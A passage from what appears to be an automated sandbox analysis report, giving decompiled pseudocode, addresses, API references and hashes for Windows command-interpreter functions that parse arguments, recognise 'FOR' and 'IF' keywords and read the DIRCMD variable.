								_v212 = _v212 + 2;
								 *_v212 =  *_t126;
								if( *_t126 == 0x22) {
									while(1) {
										_v212 = _v212 + 2;
										_t126 =  &(_t126[1]);
										 *_v212 =  *_t126;
										_t89 =  *_t126 & 0x0000ffff;
										if(_t89 == 0) {
											break;
										}
										if(_t89 == 0x22 || _t126[1] == 0) {
											if( *_t126 != 0) {
												goto L20;
											}
											break;
										} else {
											continue;
										}
									}
									_t126 = _t126;
								}
								L20:
								_v216 = _v216 & 0x00000000;
								L21:
								_t126 =  &(_t126[1]);
								continue;
							} else {
								goto L1;
							}
						} else {
							_t112 = _a12;
							if((_t112 & 0x00000001) != 0) {
								if(_v224 == 0) {
									goto L17;
								}
							}
							_t113 = _t112 & 0x00000002;
							if(_t113 == 0 || E4A7318EB(_v220,  *_t126 & 0x0000ffff) == 0) {
								_t125 = _a12 & 0x00000004;
								if(_t125 != 0) {
									_t95 = E4A7318EB(_v220,  *_t126 & 0x0000ffff);
									if(_t95 == 0) {
										goto L26;
									}
									goto L17;
								}
								L26:
								_t96 =  *_t126 & 0x0000ffff;
								if(_t96 != 0) {
									while(_t96 != 0x22 && (iswspace(_t96) != 0 || E4A7318EB( &_v208,  *_t126 & 0x0000ffff) != 0) && (_t113 == 0 || E4A7318EB(_v220,  *_t126 & 0x0000ffff) == 0)) {
										if(_t125 != 0) {
											_t100 = E4A7318EB(_v220,  *_t126 & 0x0000ffff);
											if(_t100 == 0) {
												goto L39;
											}
											break;
										}
										L39:
										_t126 =  &(_t126[1]);
										_t96 =  *_t126 & 0x0000ffff;
										if(_t96 != 0) {
											continue;
										}
										break;
									}
									if( *_t126 == 0) {
										break;
									}
									if(_v224 == 0 && _v216 == 0) {
										_v212 = _v212 + 2;
									}
									_v216 = 1;
									goto L17;
								}
								break;
							} else {
								goto L17;
							}
						}
					}
					_t79 = E4A73250F(_v228, (_v212 - _v228 >> 1) + (_v212 - _v228 >> 1) + 4);
					_pop(_t123);
					_pop(_t111);
					L28:
					return E4A7313A9(_t79, _t111, _v8 ^ _t131, _t122, _t123, _t126);
				}
				L1:
				if((_a12 & 0x00000002) != 0) {
					_t81 =  *_t126;
					if(_v216 == 0) {
						_v212 = _v212 + 2;
					}
					_v212 = _v212 + 2;
					 *_v212 = _t81;
					_v216 = 1;
					L4:
					_v212 = _v212 + 2;
					goto L21;
				}
				if((_a12 & 0x00000004) != 0) {
					 *_v212 =  *_t126;
				}
				_v216 = _v216 & 0x00000000;
				goto L4;
			}

0x4a7322d5
0x4a7322dc
0x4a7322e3
0x4a7322e6
0x4a7322ee
0x4a736cff
0x00000000
0x4a7322f4
0x4a7322f4
0x4a7322f6
0x4a7322f6
0x4a7322f9
0x4a7322f9
0x4a7322fc
0x4a7322fd
0x4a7322fe
0x4a732303
0x4a732305
0x4a732306
0x4a732308
0x4a732309
0x4a732311
0x4a732316
0x4a73231c
0x4a732322
0x4a732324
0x4a73232e
0x4a73232e
0x4a732334
0x4a73233a
0x00000000
0x00000000
0x4a73234a
0x4a73234c
0x4a732354
0x4a732354
0x4a732355
0x4a73235c
0x4a732361
0x4a732363
0x4a73236b
0x4a73236c
0x4a732372
0x4a732378
0x4a732378
0x4a73237e
0x00000000
0x00000000
0x4a732388
0x4a7323aa
0x4a7323aa
0x4a7323b8
0x4a7323da
0x4a7323e1
0x4a7323e8
0x4a7330d7
0x4a7330dd
0x4a7330e5
0x4a7330e9
0x4a7330ec
0x4a7330f2
0x00000000
0x00000000
0x4a7330f8
0x4a733105
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x4a7330f8
0x4a73310c
0x4a73310c
0x4a7323ee
0x4a7323ee
0x4a7323f5
0x4a7323f6
0x00000000
0x00000000
0x00000000
0x00000000
0x4a7323fc
0x4a7323fc
0x4a732402
0x4a73434d
0x00000000
0x00000000
0x4a734353
0x4a732408
0x4a73240b
0x4a732423
0x4a732426
0x4a7495c0
0x4a736d0b
0x00000000
0x00000000
0x00000000
0x4a736d11
0x4a73242c
0x4a73242c
0x4a732432
0x4a734412
0x4a734400
0x4a7495d4
0x4a736d18
0x00000000
0x00000000
0x00000000
0x4a736d1e
0x4a734406
0x4a734407
0x4a734408
0x4a73440e
0x00000000
0x00000000
0x00000000
0x4a734410
0x4a73443d
0x00000000
0x00000000
0x4a734449
0x4a734453
0x4a734453
0x4a73445a
0x00000000
0x4a73445a
0x00000000
0x00000000
0x00000000
0x00000000
0x4a73240b
0x4a732388
0x4a732451
0x4a732456
0x4a732457
0x4a732458
0x4a732464
0x4a732464
0x4a73211c
0x4a732120
0x4a7344f8
0x4a7344fb
0x4a73d9b1
0x4a73d9b1
0x4a734507
0x4a73450e
0x4a734511
0x4a732137
0x4a732137
0x00000000
0x4a732137
0x4a73212a
0x4a7495e7
0x4a7495e7
0x4a732130
0x00000000

APIs

iswspace.MSVCRT ref: 4A73238B

Strings

=,;, xrefs: 4A732324

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: iswspace
String ID: =,;
API String ID: 2389812497-1539845467
Opcode ID: 52916c6d38a484a3756d2839b9736e6d2e288d052f811bd32c8802bb09b1a5a5
Instruction ID: 75d0227063a29f414b313cbedabad686485caa680a1d82cf15c1d38b31181db0
Opcode Fuzzy Hash: 52916c6d38a484a3756d2839b9736e6d2e288d052f811bd32c8802bb09b1a5a5
Instruction Fuzzy Hash: A281A57591A625DBDBB08F94CC047E9BBB8EF00355F1240DAD989AB042E7748EC8CF60

Uniqueness

Uniqueness Score: -1.00%

Function 4A735B4D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E4A735B4D(void* __ebx, intOrPtr __ecx, void* __edi, signed short* _a4) {
				WCHAR* _v8;
				void* __esi;
				void* __ebp;
				signed int _t24;
				WCHAR* _t25;
				void* _t26;
				signed short* _t27;
				signed int* _t31;
				signed int* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				signed int* _t37;
				signed int* _t40;
				intOrPtr* _t47;
				signed int* _t50;
				signed int* _t51;
				signed int* _t52;
				char* _t56;
				signed short* _t59;
				signed int _t60;
				signed int* _t62;
				signed int* _t63;
				signed int* _t64;
				signed int* _t65;
				signed int* _t66;
				signed int _t67;
				void* _t68;
				intOrPtr _t69;
				signed int* _t70;
				signed short* _t73;
				signed int* _t75;
				void* _t78;

				_t68 = __edi;
				_t49 = __ecx;
				_push(__ecx);
				_t73 = _a4;
				if(_t73 == 0) {
					L18:
					_t24 = 1;
					L13:
					return _t24;
				}
				_t25 = E4A731896(0x208);
				_v8 = _t25;
				if(_t25 == 0) {
					goto L18;
				}
				_push(__ebx);
				_t26 = E4A7318EB(_t73, 0x5e);
				_t47 = 2;
				_t84 = _t26;
				if(_t26 != 0) {
					_t27 = _t73;
					_t59 =  &(_t27[1]);
					do {
						_t50 =  *_t27;
						_t27 = _t27 + _t47;
						__eflags = _t50;
					} while (_t50 != 0);
					_t31 = E4A731896(2 + (_t27 - _t59 >> 1) * 4);
					__eflags = _t31;
					if(_t31 == 0) {
						L29:
						_t24 = 1;
						goto L12;
					}
					_t51 = _t31;
					while(1) {
						__eflags =  *_t73;
						if( *_t73 == 0) {
							break;
						}
						_t60 =  *_t73 & 0x0000ffff;
						 *_t51 = _t60;
						_t51 = _t51 + _t47;
						_t73 = _t73 + _t47;
						__eflags = _t60 - 0x5e;
						if(_t60 == 0x5e) {
							_t67 = 0x5e;
							 *_t51 = _t67;
							_t51 = _t51 + _t47;
							__eflags = _t51;
						}
					}
					__eflags = 0;
					 *_t51 = 0;
					_t52 = _t31;
					_t13 =  &(_t52[0]); // 0x2
					_t75 = _t13;
					do {
						_t62 =  *_t52;
						_t52 = _t52 + _t47;
						__eflags = _t62;
					} while (_t62 != 0);
					_t49 = (_t52 - _t75 >> 1) + (_t52 - _t75 >> 1) + 2;
					_t33 = E4A732536(_t31, (_t52 - _t75 >> 1) + (_t52 - _t75 >> 1) + 2);
					_a4 = _t33;
					__eflags = _t33;
					if(__eflags != 0) {
						goto L4;
					}
					goto L29;
				} else {
					_a4 = _t73;
					L4:
					_t34 =  *0x4a754104; // 0x0
					_push(_t68);
					 *0x4a7541d4 = 1;
					_t35 = E4A731BD2(_t84, 1, _a4, _t34);
					 *0x4a7541d4 =  *0x4a7541d4 & 0x00000000;
					_t69 = _t35;
					if(_t69 == 1) {
						_t70 = E4A7319D6(_a4);
						__eflags = _t70;
						if(_t70 != 0) {
							__imp___wcsupr(_t70);
							_t56 = 0x4a744be0;
							_t37 = _t70;
							_t78 = 4;
							while(1) {
								_t63 =  *_t37;
								__eflags = _t63 -  *_t56;
								if(_t63 !=  *_t56) {
									break;
								}
								__eflags = _t63;
								if(_t63 == 0) {
									L37:
									_t37 = 0;
									L39:
									__eflags = _t37;
									if(_t37 == 0) {
										L48:
										E4A736D44(_t56, 0x234a, 1, _a4);
										L51:
										_t24 = 1;
										L11:
										L12:
										goto L13;
									}
									_t56 = L" FOR";
									_t40 = _t70;
									while(1) {
										_t64 =  *_t40;
										__eflags = _t64 -  *_t56;
										if(_t64 !=  *_t56) {
											break;
										}
										__eflags = _t64;
										if(_t64 == 0) {
											L45:
											_t40 = 0;
											L47:
											__eflags = _t40;
											if(_t40 != 0) {
												goto L51;
											}
											goto L48;
										}
										_t65 = _t40[0];
										__eflags = _t65 - _t56[2];
										if(_t65 != _t56[2]) {
											break;
										}
										_t40 = _t40 + _t78;
										_t56 =  &(_t56[_t78]);
										__eflags = _t65;
										if(_t65 != 0) {
											continue;
										}
										goto L45;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									goto L47;
								}
								_t66 = _t37[0];
								__eflags = _t66 - _t56[2];
								if(_t66 != _t56[2]) {
									break;
								}
								_t37 = _t37 + _t78;
								_t56 =  &(_t56[_t78]);
								__eflags = _t66;
								if(_t66 != 0) {
									continue;
								}
								goto L37;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L39;
						}
						_t24 = 1;
						goto L11;
					}
					if(_t69 == 0xffffffff) {
						_t24 = 0;
						goto L11;
					}
					if( *0x4a754081 == 0 ||  *((short*)( *((intOrPtr*)(_t69 + 0x38)))) != 0x3a) {
						__eflags = E4A7318EB( *((intOrPtr*)(_t69 + 0x38)), 0x2a);
						if(__eflags != 0) {
							L17:
							_t24 = E4A73216E(_t47, _t69, 0x104, __eflags, _t69);
							goto L11;
						}
						__eflags = E4A7318EB( *((intOrPtr*)(_t69 + 0x38)), 0x3f);
						if(__eflags != 0) {
							goto L17;
						}
						__eflags = E4A733370(_t47, _t69, _v8, 0x104) - _t47;
						if(__eflags == 0) {
							goto L9;
						}
						goto L17;
					} else {
						if( *0x4a7540b4 == 0) {
							_push(0);
							_push(0x400023aa);
							E4A736D44(_t49);
							goto L51;
						}
						L9:
						_t24 = E4A73566F(_t49, 0x104, _t69, _v8, 0x104, 1);
						if(_t24 == 0) {
							_t24 =  *0x4a754188; // 0x0
						}
						goto L11;
					}
				}
			}

0x4a735b4d
0x4a735b4d
0x4a735b52
0x4a735b54
0x4a735b59
0x4a735c4e
0x4a735c50
0x4a735bf9
0x4a735bfb
0x4a735bfb
0x4a735b64
0x4a735b69
0x4a735b6e
0x00000000
0x00000000
0x4a735b74
0x4a735b78
0x4a735b7f
0x4a735b80
0x4a735b82
0x4a744a9d
0x4a744a9f
0x4a744aa2
0x4a744aa2
0x4a744aa5
0x4a744aa7
0x4a744aa7
0x4a744ab8
0x4a744abd
0x4a744abf
0x4a744b11
0x4a744b13
0x00000000
0x4a744b13
0x4a744ac1
0x4a744add
0x4a744add
0x4a744ae1
0x00000000
0x00000000
0x4a744ac5
0x4a744ac8
0x4a744acb
0x4a744acd
0x4a744acf
0x4a744ad3
0x4a744ad7
0x4a744ad8
0x4a744adb
0x4a744adb
0x4a744adb
0x4a744ad3
0x4a744ae3
0x4a744ae5
0x4a744ae8
0x4a744aea
0x4a744aea
0x4a744aed
0x4a744aed
0x4a744af0
0x4a744af2
0x4a744af2
0x4a744afb
0x4a744b01
0x4a744b06
0x4a744b09
0x4a744b0b
0x00000000
0x00000000
0x00000000
0x4a735b88
0x4a735b88
0x4a735b8b
0x4a735b8b
0x4a735b90
0x4a735b99
0x4a735b9f
0x4a735ba4
0x4a735bab
0x4a735baf
0x4a744b21
0x4a744b23
0x4a744b25
0x4a744b2f
0x4a744b38
0x4a744b3d
0x4a744b3f
0x4a744b40
0x4a744b40
0x4a744b43
0x4a744b46
0x00000000
0x00000000
0x4a744b48
0x4a744b4b
0x4a744b60
0x4a744b60
0x4a744b69
0x4a744b69
0x4a744b6b
0x4a744ba1
0x4a744bab
0x4a744bca
0x4a744bcc
0x4a735bf7
0x4a735bf8
0x00000000
0x4a735bf8
0x4a744b6d
0x4a744b72
0x4a744b74
0x4a744b74
0x4a744b77
0x4a744b7a
0x00000000
0x00000000
0x4a744b7c
0x4a744b7f
0x4a744b94
0x4a744b94
0x4a744b9d
0x4a744b9d
0x4a744b9f
0x00000000
0x00000000
0x00000000
0x4a744b9f
0x4a744b81
0x4a744b85
0x4a744b89
0x00000000
0x00000000
0x4a744b8b
0x4a744b8d
0x4a744b8f
0x4a744b92
0x00000000
0x00000000
0x00000000
0x4a744b92
0x4a744b98
0x4a744b9a
0x00000000
0x4a744b9a
0x4a744b4d
0x4a744b51
0x4a744b55
0x00000000
0x00000000
0x4a744b57
0x4a744b59
0x4a744b5b
0x4a744b5e
0x00000000
0x00000000
0x00000000
0x4a744b5e
0x4a744b64
0x4a744b66
0x00000000
0x4a744b66
0x4a744b27
0x00000000
0x4a744b27
0x4a735bb8
0x4a744bb5
0x00000000
0x4a744bb5
0x4a735bca
0x4a735c26
0x4a735c28
0x4a735c46
0x4a735c47
0x00000000
0x4a735c47
0x4a735c34
0x4a735c36
0x00000000
0x00000000
0x4a735c42
0x4a735c44
0x00000000
0x00000000
0x00000000
0x4a735bd5
0x4a735bdc
0x4a744bbc
0x4a744bbe
0x4a744bc3
0x00000000
0x4a744bc9
0x4a735be2
0x4a735be9
0x4a735bf0
0x4a735bf2
0x4a735bf2
0x00000000
0x4a735bf0
0x4a735bca

Strings

IF, xrefs: 4A744B38
FOR, xrefs: 4A744B6D

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess_setjmp3wcschr
String ID: FOR$ IF
API String ID: 717958327-2924197646
Opcode ID: 4c80ee90585d168911f049589349792c8c6d19959362e901ef35177a81370419
Instruction ID: 21c8c614145718aaab8fbc465f004560b97a787d7e9bf23a01f41ef516d63d03
Opcode Fuzzy Hash: 4c80ee90585d168911f049589349792c8c6d19959362e901ef35177a81370419
Instruction Fuzzy Hash: 50515B62799613ABEBB15F24CC45BAA3E66DF5976CF020124E401CF191F761C589D390

Uniqueness

Uniqueness Score: -1.00%

Function 4A751877, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E4A751877(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t57;
				intOrPtr _t58;
				signed int _t66;
				signed int _t68;
				intOrPtr _t70;
				intOrPtr* _t71;
				signed int _t74;
				intOrPtr _t75;
				signed int _t80;
				short* _t82;
				long _t84;
				signed int _t86;
				wchar_t* _t87;
				signed int _t91;
				signed int _t95;
				short _t96;
				signed int _t99;
				signed int _t100;
				void* _t101;
				signed int _t104;
				int _t105;
				intOrPtr _t106;
				signed int _t109;
				signed int _t110;
				void* _t111;

				_t91 = __ebx;
				_push(0x20);
				_push(0x4a751a88);
				E4A73264A(__ebx, __edi, __esi);
				_t57 = E4A731896(0x4000);
				 *(_t111 - 0x20) = _t57;
				_t99 = 0;
				if(_t57 != 0) {
					 *((intOrPtr*)(_t111 - 4)) = 0;
					__eflags =  *(_t111 + 0x1c);
					if( *(_t111 + 0x1c) != 0) {
						L4:
						 *(_t111 - 0x24) = _t99;
						_t109 = 0;
						 *(_t111 - 0x28) = 0;
						_t92 = _t91 | 0xffffffff;
						 *(_t111 - 0x2c) = _t92;
						 *(_t111 - 0x1c) = _t99;
						_t104 = 0;
						__eflags = 0;
						while(1) {
							 *(_t111 - 0x30) = _t104;
							_t58 =  *((intOrPtr*)(_t111 + 0x10));
							__eflags = _t104 - _t58;
							if(_t104 >= _t58) {
								break;
							}
							_t84 =  *( *((intOrPtr*)(_t111 + 8)) + _t104 * 2) & 0x0000ffff;
							__eflags = _t84 - 0x2f;
							if(_t84 != 0x2f) {
								__eflags = _t84 - 0x22;
								if(_t84 != 0x22) {
									__eflags =  *(_t111 - 0x24) - _t99;
									if( *(_t111 - 0x24) != _t99) {
										L16:
										_t86 =  *( *((intOrPtr*)(_t111 + 8)) + _t104 * 2) & 0x0000ffff;
										__eflags = _t86 - 0x3a;
										if(_t86 == 0x3a) {
											L21:
											_t31 = _t104 + 1; // 0x1
											_t92 = _t31;
											 *(_t111 - 0x2c) = _t92;
											goto L22;
										}
										__eflags = _t86 - 0x5c;
										if(_t86 == 0x5c) {
											goto L21;
										}
										__eflags = _t86 - 0x2a;
										if(_t86 == 0x2a) {
											L20:
											 *(_t111 - 0x1c) = 1;
											goto L23;
										}
										__eflags = _t86 - 0x3f;
										if(_t86 != 0x3f) {
											goto L23;
										}
										goto L20;
									}
									_t87 = wcschr(L" &()[]{}^=;!%\'+,`~", _t84);
									__eflags = _t87;
									if(_t87 == 0) {
										_t99 = 0;
										__eflags = 0;
										goto L16;
									}
									_t23 = _t104 + 1; // 0x1
									_t109 = _t23;
									 *(_t111 - 0x28) = _t109;
									 *(_t111 - 0x1c) =  *(_t111 - 0x1c) & 0x00000000;
									_t99 = 0;
									goto L23;
								}
								__eflags =  *(_t111 - 0x24) - _t99;
								if( *(_t111 - 0x24) == _t99) {
									_t109 = _t104;
									 *(_t111 - 0x28) = _t109;
								}
								__eflags =  *(_t111 - 0x24) - _t99;
								 *(_t111 - 0x24) = 0 |  *(_t111 - 0x24) == _t99;
								goto L23;
							} else {
								_t14 = _t104 + 1; // 0x1
								_t109 = _t14;
								 *(_t111 - 0x28) = _t109;
								L22:
								 *(_t111 - 0x1c) = _t99;
								L23:
								_t104 = _t104 + 1;
								continue;
							}
						}
						__eflags = _t92 - 0xffffffff;
						if(_t92 == 0xffffffff) {
							L26:
							_t92 = _t109;
							 *(_t111 - 0x2c) = _t109;
							L27:
							_t105 = _t58 - _t109 + _t58 - _t109;
							memcpy( *(_t111 - 0x20),  *((intOrPtr*)(_t111 + 8)) + _t109 * 2, _t105);
							__eflags =  *(_t111 - 0x1c);
							if( *(_t111 - 0x1c) != 0) {
								__eflags = 0;
								_t94 =  *(_t111 - 0x20);
								 *((short*)( *(_t111 - 0x20) + _t105)) = 0;
							} else {
								_t82 =  *(_t111 - 0x20) + _t105;
								_t96 = 0x2a;
								 *_t82 = _t96;
								_t94 = 0;
								 *((short*)(_t82 + 2)) = 0;
							}
							_t106 =  *((intOrPtr*)(_t111 + 0x18));
							_t66 = E4A7514FD(_t94, _t99,  *(_t111 - 0x20), 0x2000, _t106, _t92 - _t109);
							 *0x4a754150 = _t66;
							 *0x4a75414c = _t66;
							_t95 = _t109;
							 *0x4a754144 = _t95;
							 *0x4a754148 = _t106;
							_t99 = 0;
							L32:
							__eflags = _t66 - _t99;
							if(_t66 == _t99) {
								L43:
								 *((intOrPtr*)(_t111 - 4)) = 0xfffffffe;
								E4A751A79();
								_t68 =  *0x4a754150; // 0x0
								goto L44;
							}
							__eflags =  *((intOrPtr*)(_t111 + 0x14)) - _t99;
							if( *((intOrPtr*)(_t111 + 0x14)) == _t99) {
								 *0x4a75414c =  *0x4a75414c - 1;
								__eflags =  *0x4a75414c;
								if( *0x4a75414c < 0) {
									_t80 = _t66 - 1;
									__eflags = _t80;
									 *0x4a75414c = _t80;
								}
							} else {
								 *0x4a75414c =  *0x4a75414c + 1;
								__eflags =  *0x4a75414c - _t66; // 0x0
								if(__eflags >= 0) {
									 *0x4a75414c = _t99;
								}
							}
							_t70 =  *0x4a7706c0; // 0x0
							_t100 =  *0x4a75414c; // 0x0
							_t107 =  *((intOrPtr*)(_t70 + _t100 * 4));
							_t71 =  *((intOrPtr*)(_t70 + _t100 * 4));
							_t49 = _t71 + 2; // 0x2
							_t101 = _t49;
							do {
								_t110 =  *_t71;
								_t71 = _t71 + 2;
								__eflags = _t110;
							} while (_t110 != 0);
							_t74 = _t71 - _t101 >> 1;
							_t75 =  *((intOrPtr*)(_t111 + 0xc));
							__eflags = _t74 + _t95 - _t75;
							if(_t74 + _t95 < _t75) {
								__eflags = _t75 - _t95;
								E4A73185A( *((intOrPtr*)(_t111 + 8)) + _t95 * 2, _t75 - _t95, _t107);
							} else {
								 *0x4a754150 =  *0x4a754150 & 0x00000000;
							}
							goto L43;
						}
						__eflags = _t92 - _t109;
						if(_t92 >= _t109) {
							goto L27;
						}
						goto L26;
					}
					__eflags =  *0x4a754148 -  *((intOrPtr*)(_t111 + 0x18)); // 0x0
					if(__eflags == 0) {
						_t66 =  *0x4a754150; // 0x0
						_t95 =  *0x4a754144; // 0x0
						goto L32;
					}
					goto L4;
				} else {
					_t68 = 0;
					L44:
					return E4A7313B6(_t68);
				}
			}

0x4a751877
0x4a751877
0x4a751879
0x4a75187e
0x4a751888
0x4a75188d
0x4a751890
0x4a751894
0x4a75189d
0x4a7518a0
0x4a7518a3
0x4a7518b4
0x4a7518b4
0x4a7518b7
0x4a7518b9
0x4a7518bc
0x4a7518bf
0x4a7518c2
0x4a7518c5
0x4a7518c5
0x4a7518c7
0x4a7518c7
0x4a7518ca
0x4a7518cd
0x4a7518cf
0x00000000
0x00000000
0x4a7518d8
0x4a7518dc
0x4a7518e0
0x4a7518ea
0x4a7518ee
0x4a751907
0x4a75190a
0x4a75192e
0x4a751931
0x4a751935
0x4a751939
0x4a751956
0x4a751956
0x4a751956
0x4a751959
0x00000000
0x4a751959
0x4a75193b
0x4a75193f
0x00000000
0x00000000
0x4a751941
0x4a751945
0x4a75194d
0x4a75194d
0x00000000
0x4a75194d
0x4a751947
0x4a75194b
0x00000000
0x00000000
0x00000000
0x4a75194b
0x4a751912
0x4a75191a
0x4a75191c
0x4a75192c
0x4a75192c
0x00000000
0x4a75192c
0x4a75191e
0x4a75191e
0x4a751921
0x4a751924
0x4a751928
0x00000000
0x4a751928
0x4a7518f0
0x4a7518f3
0x4a7518f5
0x4a7518f7
0x4a7518f7
0x4a7518fc
0x4a751902
0x00000000
0x4a7518e2
0x4a7518e2
0x4a7518e2
0x4a7518e5
0x4a75195c
0x4a75195c
0x4a75195f
0x4a75195f
0x00000000
0x4a75195f
0x4a7518e0
0x4a751965
0x4a751968
0x4a75196e
0x4a75196e
0x4a751970
0x4a751973
0x4a751977
0x4a751984
0x4a75198c
0x4a751990
0x4a7519a5
0x4a7519a7
0x4a7519aa
0x4a751992
0x4a751995
0x4a751999
0x4a75199a
0x4a75199d
0x4a75199f
0x4a75199f
0x4a7519b1
0x4a7519be
0x4a7519c3
0x4a7519c8
0x4a7519cd
0x4a7519cf
0x4a7519d5
0x4a7519db
0x4a7519ea
0x4a7519ea
0x4a7519ec
0x4a751a5b
0x4a751a5b
0x4a751a62
0x4a751a67
0x00000000
0x4a751a67
0x4a7519ee
0x4a7519f1
0x4a751a09
0x4a751a09
0x4a751a0f
0x4a751a11
0x4a751a11
0x4a751a12
0x4a751a12
0x4a7519f3
0x4a7519f3
0x4a7519f9
0x4a7519ff
0x4a751a01
0x4a751a01
0x4a7519ff
0x4a751a17
0x4a751a1c
0x4a751a22
0x4a751a25
0x4a751a27
0x4a751a27
0x4a751a2a
0x4a751a2a
0x4a751a2e
0x4a751a2f
0x4a751a2f
0x4a751a36
0x4a751a3b
0x4a751a3e
0x4a751a40
0x4a751a4c
0x4a751a56
0x4a751a42
0x4a751a42
0x4a751a42
0x00000000
0x4a751a40
0x4a75196a
0x4a75196c
0x00000000
0x00000000
0x00000000
0x4a75196c
0x4a7518a8
0x4a7518ae
0x4a7519df
0x4a7519e4
0x00000000
0x4a7519e4
0x00000000
0x4a751896
0x4a751896
0x4a751a6c
0x4a751a71
0x4a751a71

APIs

Part of subcall function 4A731896: GetProcessHeap.KERNEL32(00000008,4A7325C0,4A7325BB,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?), ref: 4A7318A9
Part of subcall function 4A731896: HeapAlloc.KERNEL32(00000000,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?,?,4A736CE6), ref: 4A7318B0

memcpy.MSVCRT ref: 4A751984

Strings

&()[]{}^=;!%'+,`~, xrefs: 4A75190D

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcessmemcpy
String ID: &()[]{}^=;!%'+,`~
API String ID: 4164033339-381716982
Opcode ID: 3e0d7e4d6c919c36dbf9c8e5014d21d5c921f58785b345e2de45e6d827f3971f
Instruction ID: 8092ab4478c543c3be2a959466b1ec9a16c7e6cccad159683f891ac41d8d3941
Opcode Fuzzy Hash: 3e0d7e4d6c919c36dbf9c8e5014d21d5c921f58785b345e2de45e6d827f3971f
Instruction Fuzzy Hash: 87513370E4A206CFCB70EFA8C4405D9BBB6FB453A6F02802AD400E7A58E7309D49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 4A73AEEB, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E4A73AEEB(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				char _v532;
				short _v1056;
				intOrPtr _v1060;
				void* _v1072;
				char _v1076;
				char _v1080;
				char _v1084;
				char _v1088;
				char _v1092;
				char _v1096;
				char _v1100;
				void* _v1108;
				void* _v1112;
				short _v1114;
				short _v1116;
				void* _v1120;
				short _v1122;
				short _v1124;
				void* _v1128;
				short _v1130;
				short _v1132;
				void* _v1136;
				short _v1138;
				short _v1140;
				void* _v1144;
				short _v1146;
				short _v1148;
				void* _v1152;
				short _v1154;
				short _v1156;
				char _v1160;
				char _v1164;
				intOrPtr _v1168;
				signed int _v1172;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				intOrPtr _t65;
				long _t67;
				void* _t72;
				void* _t86;
				intOrPtr _t90;
				intOrPtr _t100;
				intOrPtr _t102;
				signed int _t103;

				_t90 = __edx;
				_t86 = __ecx;
				_t61 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t61 ^ _t103;
				_v1156 = 0;
				_v1154 = 0;
				_v1160 = 0;
				asm("stosd");
				_v1148 = 0;
				_v1146 = 0;
				asm("stosd");
				_v1140 = 0;
				_v1138 = 0;
				asm("stosd");
				_v1132 = 0;
				_v1130 = 0;
				asm("stosd");
				_v1124 = 0;
				_v1122 = 0;
				_t100 = _a4;
				asm("stosd");
				_v1116 = 0;
				_v1114 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v1096 = 0;
				_v1092 = 0;
				_v1088 = 0;
				_v1084 = 0;
				_v1076 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t65 =  *0x4a754104; // 0x0
				_v1060 = _t65;
				_v1168 = 6;
				_v1164 = 0;
				_v1172 = 0x8000;
				_v1100 = 0;
				_v1080 = 0;
				_t67 = GetEnvironmentVariableW(L"DIRCMD",  &_v1056, 0x106);
				_t104 = _t67;
				if(_t67 != 0) {
					__eflags = E4A73B210(_t90, __eflags,  &_v1056,  &_v1172) - 1;
					if(__eflags == 0) {
						_push(0);
						E4A736D44(_t86);
						_t86 = 0x2377;
					}
				}
				_t72 = E4A73B210(_t90, _t104, _t100,  &_v1172);
				_t102 = 1;
				if(_t72 != 1) {
					if((_v1172 & 0x00000040) != 0) {
						_v1172 = _v1172 & 0xfffb79fb;
					}
					if((_v1172 & 0x00000400) != 0) {
						_v1172 = _v1172 & 0xfffffdbb;
					}
					E4A732C56(0, _t90, 0x106,  &_v532, 0x106, 0);
					_t109 = _v1100;
					if(_v1100 == 0) {
						_v1100 = _t102;
						_v1096 = E4A7345D8( &_v532);
						_v1088 = 1;
						_v1092 = 0;
						_v1084 = 0;
					}
					_t102 = E4A73ADF8(0, _t86, _t90, _t109,  &_v1172);
					E4A73185A(0x4a755260, 0x104,  &_v532);
					E4A731911(_v1060);
				}
				return E4A7313A9(_t102, 0, _v8 ^ _t103, _t90, 0x106, _t102);
			}

0x4a73aeeb
0x4a73aeeb
0x4a73aef6
0x4a73aefd
0x4a73af02
0x4a73af09
0x4a73af13
0x4a73af21
0x4a73af22
0x4a73af29
0x4a73af36
0x4a73af37
0x4a73af3e
0x4a73af4b
0x4a73af4c
0x4a73af53
0x4a73af60
0x4a73af61
0x4a73af68
0x4a73af6f
0x4a73af78
0x4a73af79
0x4a73af80
0x4a73af8d
0x4a73af94
0x4a73af95
0x4a73af98
0x4a73af9e
0x4a73afa4
0x4a73afaa
0x4a73afb0
0x4a73afbc
0x4a73afbd
0x4a73afbe
0x4a73afbf
0x4a73afc4
0x4a73afdc
0x4a73afe6
0x4a73afec
0x4a73aff6
0x4a73affc
0x4a73b002
0x4a73b008
0x4a73b00a
0x4a74a9a2
0x4a74a9a5
0x4a74a9ab
